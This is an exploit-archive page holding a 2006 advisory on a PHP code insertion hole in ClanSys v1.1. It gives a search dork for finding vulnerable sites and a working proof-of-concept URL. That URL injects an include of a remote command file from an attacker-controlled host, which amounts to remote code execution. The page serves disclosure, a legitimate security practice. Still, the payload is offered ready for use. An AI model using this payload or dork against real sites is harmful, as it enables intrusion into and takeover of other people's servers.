[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Clansys <= v.1.1 (index.php page) PHP Code Insertion Vulnerability
# Published : 2006-04-23
# Author : nukedx
# Previous Title : BK Forum <= 4.0 (member.asp) Remote SQL Injection Vulnerability
# Next Title : PHP-Fusion <= 6.00.306 (srch_where) SQL Injection Exploit


NukedX Security Advisory Nr 2006-29
ClanSys v1.1 (index.php page) PHP Code Insertion Vulnerability
Method found & Exploit scripted by nukedx
Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
Original advisory: http://www.nukedx.com/?viewdoc=29
Dork: "ClanSys v.1.1" 2.400 pages.
Full PoC ->
GET -> http://[victim]/[ClanSysPath]/index.php?page=[PHPCode]
EXAMPLE -> http://[victim]/[ClanSysPath]/index.php?page=<?include($s);?>&s=http://yourhost.com/cmd.txt?

# nukedx.com [2006-04-23]

# www.Syue.com [2006-04-23]